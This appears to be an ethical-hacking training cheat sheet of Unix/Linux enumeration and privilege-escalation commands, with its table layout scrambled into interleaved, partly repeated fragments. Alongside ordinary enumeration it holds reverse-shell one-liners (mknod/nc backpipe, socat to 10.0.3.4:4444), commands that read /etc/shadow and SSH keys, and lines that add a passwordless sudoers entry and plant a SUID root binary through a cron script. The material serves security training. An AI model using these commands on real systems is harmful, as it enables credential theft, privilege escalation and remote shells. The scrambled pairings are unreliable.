Ethical Hacking and Countermeasures

Certified Ethical Hacker

Unix/Linux Enumeration Cheat Sheet

Data Source Description Description Data Source Description Description Data Source Description Description
Displays a list of users who are find / -name
/usr/bin/rusers [-a] ls [options] Prints cron jobs which are %program_name%
logged on to remote machines $ ls -la /etc/cron.d find /home/username/ Locate ‘useful’ programs
[-l] [-u| -h| -i] rusers [file|dir] already present in cron.d 2>/dev/null (i.e. nc,
or machines on the local -name "*.err" (netcat, wget etc)
[Host ...] netcat, wget, nmap
network
etc)
ls [options] ls -la rootme Tells us that it is owned by
Displays a list of users who [file|dir] user find /etc/ -maxdepth
rwho [ -a] rwho are logged in to hosts on find /home/username/ 1 -name *.conf -type List .conf files in /etc
the local network ls [options] Lists .conf files in /etc -name "*.err" f -exec ls -la {} ; (recursive 1 level)
ls -la /etc/*.conf
[file|dir] (recursive 1 level) 2>/dev/null
Displays informa�on about
finger [-l] [-m] system users such as user’s ls -la /etc/exports Check the permissions and ls -la /etc/exports Find .conf files (recursive 4
[-p] [-s] [user login name, real name, ls [options] 2>/dev/null; cat find /home/username/ 2>/dev/null; cat levels) and output line
finger contents of /etc/exports
...] [user@host terminal name, idle �me, [file|dir] /etc/exports -name "*.err" /etc/exports number where the word
(NFS)
...] login �me, office loca�on, 2>/dev/null 2>/dev/null ‘password’ is located
and office phone numbers ls -aRl /etc/cron* |
ls [options] Check what can ‘others’ write cat [OPTION]
awk '$1 ~ /w.$/' cat /etc/passwd List all the users
Displays OS name and version [file|dir] in /etc/cron* directories [FILE]...
uname [options] and other details about the 2>/dev/null
Uname -a
current machine. find /home/username/ find / -perm /6000 Lists out all the SUID and cat [OPTION] List all the groups on the
cat /etc/group
Displays the informa�on -name "*.err" 2>/dev/null; SGID files [FILE]... system
pinky [OPTION]...
Use this DNS server about the users currently
[USER]... find /home/username/ find / -uid 0 -perm
logged in Lists out all the SUID and Display all the users and their
-4000 -type f cat [OPTION] [FILE]... cat /etc/shadow
-name "*.err" SGID files password hashes.
Displays the informa�on 2>/dev/null
users [OPTION]...
users about the users currently find / -perm -4000
[FILE] Shows the current users’
logged in find /home/username/ -user root -exec ls cat [OPTION] [FILE]... cat ~/.bash_history
Find SUIDs command history
-name "*.err" -ld {} \; 2>
Displays the informa�on /dev/null
who [options]
[filename] who -a about the users currently
logged in find / -perm -2000 cat [OPTION]
find /home/username/ -group root -exec ls [FILE]... cat /etc/fstab sed to check fstab
Find SGID
-name "*.err" -ld {} \; 2>
/dev/null
Used to check running
uname [options] Used to display kernel release find / ! -path cat [OPTION] [FILE]... cat /etc/services
Uname -r services
find /home/username/ "*/proc/*" -perm -2 Find world-writeable files
hostname -[option] -name "*.err" -type f -print excluding those in /proc cat [OPTION]
hostname Used to display kernel release Check who’s allowed to do
[file] 2>/dev/null [FILE]... cat /etc/sudoers what as root – Privileged
Used to display System find /home/username/ find / -xdev -type d command
uname [options] Uname -n hostname -name "*.err -perm -0002 -ls 2> Find World Writable Folders cat [OPTION] Used to display kernel
env [OPTION]... Displays all the /dev/null cat /proc/version
[FILE]... informa�on
[-][NAME=VALUE]... Env environmental variables find / -xdev -type f
[COMMAND [ARG]...] informa�on find /home/username/
-perm -0002 -ls 2> Find World Writable Files cat [OPTION] Used to display Distribu�on
-name "*.err cat /etc/*-release
Displays all sudo informa�on /dev/null [FILE]... informa�on
sudo OPTION.. COMMAND sudo -l
of the current user find /home/username/ find / -perm -2 Find word-writeable cat [OPTION] cat /etc/profile
Display default system
sudo OPTION.. -name "*.err" -type d 2>/dev/null directories [FILE]... variables
sudo -V To check Sudo version find /home –name
COMMAND
find /home/username/ *.rhosts -print Find rhost config files
Outputs the current working -name "*.err" cat [OPTION] cat /etc/shells Display available shells
pwd [OPTION]... pwd 2>/dev/null [FILE]...
directory path.
find /home -iname Find *.plan files, list
ls [options]
Lists all the files and their find /home/username/ *.plan -exec ls -la permissions and cat the file cat [OPTION] Used to display Distribu�on
permissions in the current -name "*.err" {} ; -exec cat {} cat /etc/issue
[file|dir] ls -al contents [FILE]... informa�on
directory 2>/dev/null ;
See if you can access other find /etc -iname cat [OPTION] cat /proc/cpuinfo
Used to display CPU
ls [options] [FILE]... informa�on
[file|dir] ls -ahlR /root/ user directories to find hosts. Find hosts.equiv, list
interes�ng files find /home/username/ equiv -exec ls -la {} permissions and cat the file
-name "*.err" 2>/dev/null ; -exec contents cat [OPTION]
cat /etc/cron* Used to check cronjobs
ls [options] Show the current users’ cat {} 2>/dev/null ; [FILE]...
[file|dir] ls -la ~/.*_history various history files find /var/log -type
find /home/username/ List files in specified directory cat [OPTION] List services managed by
Check for interes�ng ssh files f -exec ls -la {} ; cat /etc/inetd.conf
ls [options] -name "*.err" (/var/log) [FILE]... inetd
ls -la ~/.ssh/ in the current users’ 2>/dev/null
[file|dir]
directory find / -name cat [OPTION] cat /etc/xinetd.conf
List services managed by
"id_dsa*" -o -name [FILE]... inetd xinetd
ls [options] ls -la "id_rsa*" -o -name
Read root’s history files
[file|dir] /root/.*_history "known_hosts" -o
find /home/username/ cat /etc/xinetd.conf
-name Find SSH keys/host Extract associated binaries
ls [options] Check Configura�on of inetd -name "*.err" cat [OPTION] 2>/dev/null | awk
"authorized_hosts" informa�on from xinetd.conf and show
[file|dir] ls -la /usr/sbin/in.* services [FILE]... '{print $7}' |xargs
-o -name permissions of eachs
-r ls -la 2>/dev/null
"authorized_keys"
ls [options] Scheduled jobs overview 2>/dev/null |xargs -r
[file|dir] ls -la /etc/cron* (hourly, daily, monthly etc) ls -la

www.eccouncil.org/ceh
Over 50% Of Professionals Received Promo�ons a�er C|EH
 Ethical Hacking and Countermeasures
Certified Ethical Hacker

Unix/Linux Enumeration Cheat Sheet

Data Source Description Description Data Source Description Description Data Source Description Description
cat lastlog [<-u|--user> Gives informa�on on when
Used to list all network socat INPUT_TYPE $ socat
cat [OPTION] [FILE]... /etc/network/interfa Used for Connec�ng to the login-name] lastlog –u the specified user last logged
interfaces (OPTIONS) file:`tty`,raw,echo=0
ces port using socat [<-t|--time> days] %username% in
OUTPUT_TYPE(OPTIONS tcp-listen:4444 [<-h|--help>]
View port
cat [OPTION] [FILE]... cat /etc/resolv.conf numbers/services
mappings mknod /tmp/backpipe lastlog [<-u|--user>
p; login-name] lastlog |grep -v Shows the en�re list of
View port numbers/services mknod device-name [<-t|--time> days] "Never" previously logged on users
cat [OPTION] [FILE]... cat /etc/services /bin/sh 0<
mappings device-type Used for Reverse connec�on [<-h|--help>]
major-number /tmp/backpipe using mknod
cat | nc <ip> <port> 1>
minor-number set
/etc/apache2/envvars /tmp/backpipe; rm Displays environmental
cat [OPTION] 2>/dev/null |grep -i Check which account is [--abefhkmnptuvxBCHP
/tmp/backpipe set variables
[FILE]... 'user|group' |awk Apache running as ] [-o option-name]
'{sub(/.*export [arg ...]
dpkg [options] dpkg -l <application Check the version of an
/,"")}1' filename name> installed applica�on
Displays command history of
Displays the user ID and $ history history
id [OPTION] id echo "www-data current user
group ID of current user username host_list
ALL=NOPASSWD: ALL" >> Edit sudoers file and grant
=
/etc/sudoers && sudo access to the current lsof [option][user
List open files (output will
whoami [OPTION] whoami
Outputs the name of the (users) command lsof -i -n
current user chmod 440 user with no password name]
depend on account
/etc/sudoers privileges)
netstat [OPTION] netstat -antup Check for open ports echo [option] head [OPTION]... Read roots mail using this
echo $PATH Displays Path informa�on head /var/mail/root
[string] [FILE]... command
Lists all TCP sockets and
netstat [OPTION] netstat -antp related PIDs (-p Privileged echo “chown Display scheduled jobs for the
root:root crontab [-u user] crontab -l -u
command) specified user – Privileged
/tmp/rootme; chmod Change the executable’s file %username%
command
Lists all UDP sockets and echo [option] [string] u+s owner and group as root. It
netstat [OPTION] netstat -anup related PIDs (-p Privileged /tmp/rootme;”>/usr/lo will also set the SUID bit
command) $ top top Get the list of current tasks
cal/sbin/cron-logrota
cat [OPTION] Check who’s allowed to do te.sh
[FILE]... cat /etc/sudoers what as root – Privileged Display File system ifconfig [...OPTIONS]
df [OPTION]...[FILE]... df -a /sbin/ifconfig -a Lists all network interfaces
command informa�on [INTERFACE]

ps [OPTIONS] ps -elf Check Processes Check the storage

df [OPTION]...[FILE]... df -h informa�on arp [-v] [-i if] [-H
arp -a Display ARP communica�ons
Check processes running type] -a [hostname]
ps [OPTIONS] ps -elf | grep root for i in $(cat
without root privileges
/etc/passwd
ps [OPTIONS] ps aux | grep root View services running as root for NAME [in WORDS 2>/dev/null| cut List all uid’s and respec�ve route route Display route informa�on
... ] ; do COMMANDS; -d":" -f1 group memberships
ps aux | awk '{print 2>/dev/null);do id iptables --table
$11}' $i;done 2>/dev/null TABLE -A/-C/-D... iptables -L
List rules – Privileged
Lookup process binary path CHAIN rule --jump command
ps [OPTIONS] |xargs -r ls -la
and permissions grep -v -E "^#" Target
2>/dev/null |awk grep [options] Shows the List all super user
/etc/passwd | awk -F:
'!x[$0]++' pattern [files] accounts apache2ctl (or
'$3 == 0 { print $1}' apachectl command List loaded Apache modules
apachectl) -M
cat /etc/sheldpkg -l
dpkg [option...] sudo -V | grep "Sudo
rpm -qa Check installed packages Displays the installed MYSQL
action ver" | grep mysql --version mysql --version
ls version details
"1.6.8p9\|1.6.9p18\|1.8
dpkg [option...] Check Installed packages .14 psql [ option... ] [
dpkg -l \|1.8.20\|1.6.9p21\|1.7. Provides the installed
action (Debian) grep [options] Check if the sudo version is dbname psql -V
2p4\|1\. Postgres version details
pattern [files] vulnerable using this grep [ username ] ]
dpkg --list 8\.[0123]$\|1\.3\.[^1]\|
2>/dev/null| grep 1 Provides installed Perl
\.4\.\d*\|1\.5\.\d*\ $ perl -v perl -v
compiler |grep -v version details
dpkg [option...] decompiler |1\.6\.\d*\|1.5$\|1.6$"
List available compilers java [ options ]
action 2>/dev/null && yum Provides Installed Java
list installed 'gcc*' grep -l -i pass Check log files for keywords class [ argument ... java -version
grep [options] version details
2>/dev/null| grep gcc /var/log/*.log (‘pass’ in this example) and ]
pattern [files]
2>/dev/null 2>/dev/null show posi�ve matches python [ -d ] [ -E ]
Shows Installed packages [ -h ] [ -i ] [ -m
rpm -qa rpm -qa w [options] user Check who is currently module-name ] [ -O ]
(Red Hat) w logged in and what they’re
[...] [ -Q argument ] [ -S
doing Get Installed Python version
] [ -t ] [ -u ] [ -v python --version
ip [options] OBJECT details
ip addr Check network configura�on ] [ -V ] [ -W
COMMAND last [options] Used for lis�ng of last logged argument ] [ -x ] [
last
[username...] [tty...] on users -c command | script
$ socat exec:'bash | - ] [ arguments ]
socat
-li',pty,stderr,setsid Used for Listening port using lastlog [<-u|--user>
INPUT_TYPE(OPTIONS)
,sigint,sane socat login-name] Get the informa�on on when
OUTPUT_TYPE(OPTIONS) lastlog
tcp:10.0.3.4:4444 [<-t|--time> days] all users last logged in
[<-h|--help>]

www.eccouncil.org/ceh 97% Of Professionals Stated That Skills Acquired in C|EH Helped Safeguard Their Organiza�ons 02
 Ethical Hacking and Countermeasures
Certified Ethical Hacker

Unix/Linux Enumeration Cheat Sheet

Data Source Description Description

ruby [--copyright]
[--version]
[-Sacdlnpswvy]
[-0[octal]] [-C
directory] [-F
pattern] [-I
directory] [-K c] Get Installed Ruby version
ruby -v
[-T[level]] [-e details
command]
[-i[extension]] [-r
library]
[-x[directory]] [--]
[program_file]
[argument ...]

which %program_name%
which [filename1] Used to locate ‘useful’
(i.e. nc, netcat,
[filename2] ... programs (netcat, wget etc)t
wget, nmap etc

screen [-opts] [cmd [

screen -ls List screen sessions
args]]

screen [-opts] [cmd

screen -dr <session> Used to a�ach to a session
[args]]

tmux [-2CluvV] [-c

shell-command] [-f
file] [-L Get a list of the currently
tmux ls
socket-name] [-S running sessionss
socket-path]
[command [flags]]
tmux [-2CluvV] [-c
shell-command] [-f
file] [-L tmux attach-session
socket-name] [-S To a�ach a session
-t 0
socket-path]
[command [flags]]

timeout [OPTION]
DURATION COMMAND timeout 1 tcpdump Used to check if you can sniff
[ARG]... traffic

www.eccouncil.org/ceh 97% Of Professionals Found C|EH Labs to Accurately Mimic Real-World Cyber Threats 03